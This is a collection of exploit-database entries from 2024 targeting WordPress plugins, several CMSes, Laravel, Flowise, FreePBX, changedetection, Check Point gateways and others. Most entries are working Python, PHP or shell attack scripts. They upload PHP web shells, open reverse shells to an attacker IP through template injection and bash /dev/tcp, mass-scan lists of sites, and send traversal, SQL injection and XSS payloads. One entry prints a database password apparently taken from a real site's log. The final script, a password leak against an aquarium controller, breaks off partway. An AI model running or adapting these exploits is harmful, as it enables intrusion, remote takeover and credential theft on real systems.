
  1. # Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution # Date: 2024-04-16 # Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Vendor Homepage: https://wordpress.org # Software Link: https://wordpress.org/plugins/background-image-cropper/ # Version: 1.2 # Category : webapps # Tested on: windows 10 , firefox import sys , requests, re from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>""" requests.urllib3.disable_warnings() headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'} try: target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()] except IndexError: path = str(sys.argv[0]).split('\\') exit('\n [!] 
Enter <' + path[len(path) - 1] + '> <sites.txt>') def URLdomain(site): if site.startswith("http://") : site = site.replace("http://","") elif site.startswith("https://") : site = site.replace("https://","") else : pass pattern = re.compile('(.*)/') while re.findall(pattern,site): sitez = re.findall(pattern,site) site = sitez[0] return site def FourHundredThree(url): try: url = 'http://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers, allow_redirects=True,timeout=15) if 'enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('Shells.txt', 'a').write(url + '/wp-content/plugins/background-image-cropper/ups.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('Shells.txt', 'a').write(url + '/wp-content/plugins/background-image-cropper/ups.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) except : print ' -| ' + url + ' --> {}[Failed]'.format(fr) mp = Pool(150) mp.map(FourHundredThree, target) mp.close() mp.join() print '\n [!] {}Saved in LOL.txt'.format(fc)
  2. # Exploit Title: FlatPress v1.3 - Remote Command Execution # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 19.04.2024 # Vendor Homepage: https://www.flatpress.org # Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip # Tested Version: 1.3 (latest) # Tested on: MacOS import requests import time import random import string def random_string(length=5): """Rastgele bir string oluşturur.""" letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(length)) def login_and_upload(base_url, username, password): filename = random_string() + ".php" login_url = f"http://{base_url}/login.php" upload_url = f"http://{base_url}/admin.php?p=uploader&action=default" with requests.Session() as session: # Exploiting print("Exploiting...") time.sleep(1) # Giriş yapma denemesi login_data = { 'user': username, 'pass': password, 'submit': 'Login' } print("Logging in...") response = session.post(login_url, data=login_data) time.sleep(1) if "Logout" in response.text: print("Login Successful!") else: print("Login Failed!") print(response.text) return # Dosya yükleme denemesi print("Shell uploading...") time.sleep(1) # Form verileri ve dosyalar files = { 'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'), } form_data = { '_wpnonce': '9e0ed04260', '_wp_http_referer': '/admin.php?p=uploader', 'upload': 'Upload' } response = session.post(upload_url, files=files, data=form_data) if "File(s) uploaded" in response.text or "Upload" in response.text: shell_url = f"http://{base_url}/fp-content/attachs/(unknown)" print(f"Your Shell is Ready: {shell_url}") time.sleep(1) print(f"Shell Usage: {shell_url}?0=command") else: print("Exploit Failed!") print(response.status_code, response.text) # Örnek kullanım: python script.py siteadi.com username password if __name__ == "__main__": import sys if len(sys.argv) != 4: print("Usage: script.py <base_url> <username> <password>") else: base_url, username, password = sys.argv[1:] 
login_and_upload(base_url, username, password)
  3. # Exploit Title: Laravel Framework 11 - Credential Leakage # Google Dork: N/A # Date: [2024-04-19] # Exploit Author: Huseein Amer # Vendor Homepage: [https://laravel.com/] # Software Link: N/A # Version: 8.* - 11.* (REQUIRED) # Tested on: [N/A] # CVE : CVE-2024-29291 Proof of concept: Go to any Laravel-based website and navigate to storage/logs/laravel.log. Open the file and search for "PDO->__construct('mysql:host=". The result: shell Copy code #0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) #1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) Credentials: Username: u429384055_jscv Password: Jaly$$a0p0p0p0 Host: sql1...
  4. # Exploit Title: SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 18.04.2024 # Vendor Homepage: https://www.sofawiki.com # Software Link: https://www.sofawiki.com/site/files/snapshot.zip # Tested Version: v3.9.2 (latest) # Tested on: MacOS import requests import random import sys import time def main(): if len(sys.argv) < 4: print("Usage: python exploit.py <base_url> <username> <password>") sys.exit(1) base_url, username, password = sys.argv[1:4] filename = f"{random.randint(10000, 99999)}.phtml" session = requests.Session() login_url = f"{base_url}/index.php" login_data = { "submitlogin": "Login", "username": username, "pass": password, "name": "SofaWiki", "action": "login" } print("Exploiting...") time.sleep(1) response = session.post(login_url, data=login_data) if "Logout" not in response.text: print("Login failed:", response.text) sys.exit() print("Login Successful") time.sleep(1) php_shell_code = """ <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> """ print("Shell uploading...") time.sleep(1) upload_url = f"{base_url}/index.php" files = { "uploadedfile": (filename, php_shell_code, "text/php"), "action": (None, "uploadfile"), "MAX_FILE_SIZE": (None, "8000000"), "filename": (None, filename), "content": (None, "content") } response = session.post(upload_url, files=files) if response.status_code == 200: print(f"Your shell is ready: {base_url}/site/files/(unknown)") else: print("Upload failed:", response.text) if __name__ == "__main__": main()
  5. # Exploit Title: Flowise 1.6.5 - Authentication Bypass # Date: 17-April-2024 # Exploit Author: Maerifat Majeed # Vendor Homepage: https://flowiseai.com/ # Software Link: https://github.com/FlowiseAI/Flowise/releases # Version: 1.6.5 # Tested on: mac-os # CVE : CVE-2024-31621 Flowise versions <= 1.6.5 are vulnerable to an authentication bypass. The code snippet this.app.use((req, res, next) => { > if (req.url.includes('/api/v1/')) { > whitelistURLs.some((url) => req.url.includes(url)) ? > next() : basicAuthMiddleware(req, res, next) > } else next() > }) applies the authentication middleware to every endpoint under the /api/v1 path except a few whitelisted endpoints. But the path check is case-sensitive and only matches lowercase /api/v1, so anyone who rewrites the path in uppercase, e.g. /API/V1, bypasses the authentication. *POC:* curl http://localhost:3000/Api/v1/credentials For a seamless authentication bypass, use the Burp Suite Match and Replace rules in the proxy settings. Add rule: Request first line api/v1 ==> API/V1
  6. # Exploit Title: Wordpress Theme XStore 9.3.8 - SQLi # Google Dork: N/A # Date: 2024-05-16 # Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly) # Version: 5.3.5 # Tested on: Windows10 # CVE: CVE-2024-33559 Poc <https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection#poc> POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: keep-alive Upgrade-Insecure-Requests: 1
  7. # Exploit : Prison Management System Using PHP - SQL Injection Authentication Bypass # Date: 15/03/2024 # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sql/17287/prison-management-system.html # Tested on: Windows, XAMPP # CVE : CVE-2024-33288 # Proof of Concept: Step 1 - Visit http://localhost/prison/ Step 2 - Click the Admin Dashboard button; you are redirected to the login page. Step 3 - Enter username as admin' or '1'='1 and password as 123456 Step 4 - Click Sign In; you are now logged in as admin.
  8. # Title: Rocket LMS 1.9 - Persistent Cross Site Scripting (XSS) # Date: 04/16/2024 # Exploit Author: Sergio Medeiros # Vendor Homepage: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735 # Software Link: https://lms.rocket-soft.org # Version: 1.9 # Tested on Firefox and Chrome Browsers # Patched Version: Patch Pending # Category: Web Application # CVE: CVE-2024-34241 # Exploit link: https://grumpz.net/cve-2024-34241-a-step-by-step-discovery-guide # PoC: In order to exploit this systemic stored XSS vulnerability, identify the areas of the web application where a WYSIWYG editor is used, for example the create/edit course description section. Input random text in the description section and create the course while intercepting the request with Burp Suite or your preferred proxy. In the *description* parameter, or the associated parameter that handles the user input from the WYSIWYG editor, input the following payload and then issue the request: <details/open/ontoggle=prompt(origin)>
  9. # Exploit Title: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE) # Date: 04/27/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://backdropcms.org/ # Software Link: https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip # Version: latest # Tested on: MacOS import os import time import zipfile def create_files(): info_content = """ type = module name = Block description = Controls the visual building blocks a page is constructed with. Blocks are boxes of content rendered into an area, or region, of a web page. package = Layouts tags[] = Blocks tags[] = Site Architecture version = BACKDROP_VERSION backdrop = 1.x configure = admin/structure/block ; Added by Backdrop CMS packaging script on 2024-03-07 project = backdrop version = 1.27.1 timestamp = 1709862662 """ shell_info_path = "shell/shell.info" os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörüoluşturur with open(shell_info_path, "w") as file: file.write(info_content) shell_content = """ <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> """ shell_php_path = "shell/shell.php" with open(shell_php_path, "w") as file: file.write(shell_content) return shell_info_path, shell_php_path def create_zip(info_path, php_path): zip_filename = "shell.zip" with zipfile.ZipFile(zip_filename, 'w') as zipf: zipf.write(info_path, arcname='shell/shell.info') zipf.write(php_path, arcname='shell/shell.php') return zip_filename def main(url): print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit") time.sleep(3) print("Evil module generating...") time.sleep(2) info_path, php_path = create_files() zip_filename = create_zip(info_path, php_path) print("Evil module generated!", zip_filename) time.sleep(2) print("Go to " + url + 
"/admin/modules/install and upload the " + zip_filename + " for Manual Installation.") time.sleep(2) print("Your shell address:", url + "/modules/shell/shell.php") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python script.py [url]") else: main(sys.argv[1])
  10. # Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal # Google Dork: N/A # Date: 2024-05-16 # Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly) # Vendor Homepage: https://ofbiz.apache.org/ ## Software Link: https://ofbiz.apache.org/download.html # Version: below <=18.12.12 # Tested on: Windows10 Poc. 1- POST /webtools/control/xmlrpc HTTP/1.1 Host: vulnerable-host.com Content-Type: text/xml <?xml version="1.0"?> <methodCall> <methodName>example.createBlogPost</methodName> <params> <param> <value><string>../../../../../../etc/passwd</string></value> </param> </params> </methodCall> OR 2- POST /webtools/control/xmlrpc HTTP/1.1 Host: vulnerable-host.com Content-Type: text/xml <?xml version="1.0"?> <methodCall> <methodName>performCommand</methodName> <params> <param> <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value> </param> </params> </methodCall>
  11. # Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution # Date: 14/04/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.popojicms.org/ # Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip # Version: Version : 2.0.1 # Tested on: https://www.softaculous.com/apps/cms/PopojiCMS import requests import time import sys def exploit(url, username, password): login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin" login_data = {"username": username, "password": password} headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": f "{url}/po-admin/index.php"} session = requests.Session() login_response = session.post(login_url, data=login_data, headers=headers) if "Administrator PopojiCMS" in login_response.text: print("Login Successful!") time.sleep(1) # 1 saniye bekle else: print("Login Failed!") return edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial" edit_data = {"meta_content": """<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html>"""} edit_response = session.post(edit_url, data=edit_data, headers=headers) if "cmd" in edit_response.text: print("Your shell is ready:", url) time.sleep(1) else: print("Exploit Failed!") return if __name__ == "__main__": if len(sys.argv) != 4: print("Kullanım: python exploit.py sitename username password") sys.exit(1) url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] print("Exploiting...") time.sleep(1) print("Logging in...") time.sleep(1) exploit(url, username, password)
  12. # Exploit Title: iMLog < 1.307 - Persistent Cross Site Scripting (XSS) # Date: 22/5/2024 # Exploit Author: Gabriel Felipe # Vendor Homepage: https://itssglobal.com # Software Link: https://itssglobal.com/index.php/imlog/ # Version: 1.307 # Tested on: Firefox and Chrome Browsers # Patched Version: 1.308 # Category: Web Application # PoC: iMLog < 1.307 is vulnerable to persistent cross-site scripting (XSS) via the "User Management" feature. An attacker could inject malicious JavaScript into a user record they control, so that when an admin opens "User Maintenance" the code is executed; this could lead to the creation of new admin users, resulting in privilege escalation. 1. Login to user account 2. Go to Setup > "User Maintenance" 3. Click on "Search" and then select your UserID. 4. Change the "Last Name" input to `<img/src/onerror=prompt('XSS')>` 5. Click on "Save" 6. Refresh the page; the XSS will be triggered.
  13. Exploit Title: BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection Date: 14 Apr 2024 Exploit Author: Ivan Spiridonov (xbz0n) Software Link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135 Version: 2.0.3 Tested on: Ubuntu 20.04 CVE: CVE-2024-32136 SQL Injection SQL injection is a type of security vulnerability that allows an attacker to interfere with an application's database queries. It usually involves the insertion or "injection" of an SQL query via the input data from the client into the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. Affected Components Plugin: BWL Advanced FAQ Manager Version: 2.0.3 Affected Parameter: 'date_range' Affected Page: /wp-admin/edit.php Description The vulnerability exists within the 'date_range' parameter used in the 'bwl-advanced-faq-analytics' page of the BWL Advanced FAQ Manager plugin. Authenticated attackers can execute arbitrary SQL commands within the database by manipulating the input to this parameter. 
Proof of Concept Manual Exploitation The following GET request demonstrates the vulnerability: GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics Connection: close Cookie: [Relevant Cookies] Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability. Recommendations BWL Advanced FAQ Manager v2.0.3 users are advised to update the plugin to the fixed version v2.0.4.
  14. # Exploit Title : ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated) # Date: 2024-5-24 # Exploit Author: tmrswrr # Category: Webapps # Vendor Homepage: https://www.elkarte.net/ # Software Link : https://github.com/elkarte/Elkarte/releases/download/v1.1.9/ElkArte_v1-1-9_install.zip # Version : 1.1.9 1) After login go to Manage and Install theme > https://127.0.0.1/ElkArte/index.php?action=admin;area=theme;sa=admin;c2e3e39a0d=276c2e3e39a0d65W2qg1voAFfX1yNc5m 2) Upload test.zip file and click install > test.zip > test.php > <?php echo system('id'); ?> 3) Go to Theme Setting > Theme Directory > https://127.0.0.1/ElkArte/themes/test/test.php Result : uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte) uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte)
  15. # Exploit Title: htmlLawed 1.2.5 - Remote Code Execution (RCE) # Date: 2024-04-24 # Exploit Author: Miguel Redondo (aka d4t4s3c) # Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed # Software Link: https://github.com/kesar/HTMLawed # Version: <= 1.2.5 # Tested on: Linux # CVE: CVE-2022-35914 banner(){ echo " ______ _______ ____ ___ ____ ____ _________ ___ _ _ _" echo " / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |" echo "| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_" echo "| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__ _|" echo " \____| \_/ |_____| |_____|\___/_____|_____| |____/____/ /_/|_| |_|" } while getopts ":u:c:" arg; do case $arg in u) URL=$OPTARG; let parameter_counter+=1 ;; c) CMD=$OPTARG; let parameter_counter+=1 ;; esac done if [ -z "$URL" ] || [ -z "$CMD" ]; then banner echo -e "\n[i] Usage: ${0} -u <URL> -c <CMD>\n" exit else banner echo -e "\n[+] Command output:" fi curl -s -d "sid=foo&hhook=exec&text=${CMD}" -b "sid=foo" ${URL} | egrep '\&nbsp; \[[0-9]+\] =\>'| sed -E 's/\&nbsp; \[[0-9]+\] =\> (.*)<br \/>/\1/'
  16. # Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE) # Date: 5-26-2024 # Exploit Author: Zach Crosman (zcrosman) # Vendor Homepage: changedetection.io # Software Link: https://github.com/dgtlmoon/changedetection.io # Version: <= 0.45.20 # Tested on: Linux # CVE : CVE-2024-32651 from pwn import * import requests from bs4 import BeautifulSoup import argparse def start_listener(port): listener = listen(port) print(f"Listening on port {port}...") conn = listener.wait_for_connection() print("Connection received!") context.newline = b'\r\n' # Switch to interactive mode conn.interactive() def add_detection(url, listen_ip, listen_port, notification_url=''): session = requests.Session() # First request to get CSRF token request1_headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = session.get(url, headers=request1_headers) soup = BeautifulSoup(response.text, 'html.parser') csrf_token = soup.find('input', {'name': 'csrf_token'})['value'] print(f'Obtained CSRF token: {csrf_token}') # Second request to submit the form and get the redirect URL add_url = f"{url}/form/add/quickwatch" add_url_headers = { # Define add_url_headers here "Origin": url, "Content-Type": "application/x-www-form-urlencoded" } add_url_data = { "csrf_token": csrf_token, "url": "https://reddit.com/r/baseball", "tags": '', "edit_and_watch_submit_button": "Edit > Watch", "processor": "text_json_diff" } post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False) # Extract the URL from the Location header if 'Location' in post_response.headers: redirect_url = post_response.headers['Location'] print(f'Redirect URL: {redirect_url}') else: print('No redirect URL found') 
return # Third request to add the changedetection url with ssti in notification config save_detection_url = f"{url}{redirect_url}" save_detection_headers = { # Define save_detection_headers here "Referer": redirect_url, "Cookie": f"session={session.cookies.get('session')}" } save_detection_data = { "csrf_token": csrf_token, "url": "https://reddit.com/r/all", "title": '', "tags": '', "time_between_check-weeks": '', "time_between_check-days": '', "time_between_check-hours": '', "time_between_check-minutes": '', "time_between_check-seconds": '30', "filter_failure_notification_send": 'y', "fetch_backend": 'system', "webdriver_delay": '', "webdriver_js_execute_code": '', "method": 'GET', "headers": '', "body": '', "notification_urls": notification_url, "notification_title": '', "notification_body": f""" {{% for x in ().__class__.__base__.__subclasses__() %}} {{% if "warning" in x.__name__ %}} {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}} {{% endif %}} {{% endfor %}} """, "notification_format": 'System default', "include_filters": '', "subtractive_selectors": '', "filter_text_added": 'y', "filter_text_replaced": 'y', "filter_text_removed": 'y', "trigger_text": '', "ignore_text": '', "text_should_not_be_present": '', "extract_text": '', "save_button": 'Save' } final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data) print('Final request made.') if __name__ == "__main__": parser = argparse.ArgumentParser(description='Add detection and start listener') parser.add_argument('--url', type=str, required=True, help='Base URL of the target site') parser.add_argument('--port', type=int, help='Port for the listener', default=4444) parser.add_argument('--ip', type=str, required=True, help='IP address for the listener') 
parser.add_argument('--notification', type=str, help='Notification url if you don\'t want to use the system default') args = parser.parse_args() add_detection(args.url, args.ip, args.port, args.notification) start_listener(args.port)
  17. # Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336 # Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 # CVE : CVE-2024-24919 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___ / ____\ \ / / ____| |__ \ / _ \__ \| || | |__ \| || | / _ \/_ |/ _ \ | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) | | | \ \/ / | __|______/ /| | | |/ /|__ _|______/ /|__ _\__, || |\__, | | |____ \ / | |____ / /_| |_| / /_ | | / /_ | | / / | | / / \_____| \/ |______| |____|\___/____| |_| |____| |_| /_/ |_| /_/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''') def exploit(url, path): url = url + '/clients/MyCRL' data = "aCSHELL/../../../../../../../../../../.."+ path headers = { 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' } s = Session() req = Request('POST', url, data=data, headers=headers) prepped = req.prepare() #del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15 ) print(prepped.headers) print(url) print(resp.headers) print(resp.status_code) if __name__ == '__main__': title() if(len(sys.argv) < 3): print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0])) print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1],sys.argv[2])
  18. # Exploit Title: FreePBX 16 - Remote Code Execution (RCE) (Authenticated) # Exploit Author: Cold z3ro # Date: 6/1/2024 # Tested on: 14,15,16 # Vendor: https://www.freepbx.org/ <?php /// /// FREEPBX [14,15,16] API Module Authenticated RCE /// Orginal Difcon || https://www.youtube.com/watch?v=rqFJ0BxwlLI /// Cod[3]d by Cold z3ro /// $url = "10.10.10.186"; // remote host $backconnectip = "192.168.0.2"; $port = "4444"; $PHPSESSID = "any valid session even extension"; echo "checking $url\n"; $url = trim($url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://'.$url.'/admin/ajax.php?module=api&command=generatedocs'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST'); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2); curl_setopt($ch, CURLOPT_TIMEOUT, 2); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Referer: http://'.$url.'/admin/config.php?display=api', 'Content-Type: application/x-www-form-urlencoded', ]); curl_setopt($ch, CURLOPT_COOKIE, 'PHPSESSID='.$PHPSESSID); curl_setopt($ch, CURLOPT_POSTFIELDS, 'scopes=rest&host=http://'.$backconnectip.'/$(bash -1 >%26 /dev/tcp/'.$backconnectip.'/4444 0>%261)'); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); echo $response = curl_exec($ch)."\n"; curl_close($ch); ?>
  19. # Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI) # Exploit Author: tmrswrr # Date: 30/05/2024 # Vendor: https://akaunting.com/forum # Software Link: https://akaunting.com/apps/crm # Vulnerable Version(s): 3.1.8 # Tested : https://www.softaculous.com/apps/erp/Akaunting 1 ) Login with admin cred and go to : Items > New Item https://127.0.0.1/Akaunting/1/common/items 2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers 3 ) Save it 4 ) You will be see result : 49 ==================================================================================== 1 ) Login with admin cred and go to :Settings > Taxes > New Tax https://127.0.0.1/Akaunting/1/settings/taxes/1/edit 2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab ==================================================================================== 1 ) Login with admin cred and go to : Banking > Transactions > New Income https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income 2 ) Write SSTI payload : {{7*7}} Description field 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab ======================================================================================= 1 ) Login with admin cred https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit 2 ) Write SSTI payload : {{7*7}} Name field 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# Aquatronica Control System 5.1.6 Passwords Leak Vulnerability
#
#
# Vendor: Aquatronica s.r.l.
# Product web page: https://www.aquatronica.com
# Affected version: Firmware: 5.1.6
#                   Web: 2.0
#
# Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy
# to use, allowing you to control all the electrical devices in
# an aquarium and to monitor all their parameters; it can be used
# for soft water aquariums, salt water aquariums or both simultaneously.
#
# Desc: The tcp.php endpoint on the Aquatronica controller is exposed
# to unauthenticated attackers over the network. This vulnerability
# allows remote attackers to send a POST request which can reveal
# sensitive configuration information, including plaintext passwords.
# This can lead to unauthorized access and control over the aquarium
# controller, compromising its security and potentially allowing attackers
# to manipulate its settings.
#
# Tested on: Apache/2.0.54 (Unix)
#            PHP/5.4.17
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2024-5824
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
#
#
# 04.05.2024
#
# NOTE(review): the shebang says plain `python`, but the f-strings below
# require Python 3.6+.  `requests` is a third-party dependency.
import requests, html, re, sys, time
from urllib.parse import unquote

# Request parameters.  Note the case games below: the script lowercases
# `program` and `function_id` and uppercases `command` when building the
# request, so the wire values are "tcp.php", "tcp_xml_request" and
# "WS_GET_NETWORK_CFG".
program = "TCP"
command = "ws_get_network_cfg"
function_id = "TCP_XML_REQUEST"

# Banner.  The original line breaks of this ASCII art were lost when the
# listing was flattened; the literal is kept as it appears on the page.
print(""" _________ . . (.. \_ , |\ /| \ O \ /| \ \/ / \______ \/ | \ / vvvv\ \ | / | \^^^^ == \_/ | `\_ === \.
| / /\_ \ / | |/ \_ \| / ___ ______________\________/________aquatronica_0day___ | | | | | | """)

# Exactly one positional argument: the controller's host:port.
if len(sys.argv) != 2:
    print("Usage: python aqua.py <ip:port>")
    sys.exit(1)

ip = sys.argv[1]
# Plain HTTP only; there is no TLS variant in this script.
url = f"http://{ip}/{program.lower()}.php"
